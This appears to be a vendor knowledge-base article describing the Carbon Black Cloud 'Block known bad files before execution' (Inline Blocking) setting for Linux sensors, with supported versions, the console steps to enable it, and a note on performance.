Environment
- Carbon Black Cloud Console: Build 1.23 and Higher
- Linux: Sensor Version 2.16.0 and Higher
- OS Distributions supported: eBPF Distros
Question
What is "Block known bad files before execution" setting?
Answer
Inline Blocking (ILB) is an advanced Linux security measure aimed at identifying and preventing the execution of malicious binaries.
Additional Notes
- To enable Inline Blocking, follow the steps below:
- Log into the Console
- Navigate to Enforce page
- Navigate to Policies
- Enable “Block known bad files before execution”.
- Tip: “Pause executables to analyze and attempt to block known bad files before they run. Increases security but may impact overall performance in high-performance computing environments.”
- To mitigate potential adverse effects on system performance, we've implemented a timeout for the delay.
- Enabling this feature for Sensors that are not running supported versions will not have an affect on the endpoint.
- Before the implementation of Inline blocking, our sensor permitted all binaries to initiate running long enough to compute their hashes and assess them based on the local cached policy rules. In case of identifying a malevolent binary, the system would terminate its process. Carbon Black Cloud's new inline blocking for Linux improves on the existing Linux prevention capability by eliminating the ability for short-running binaries to execute before being entirely restricted.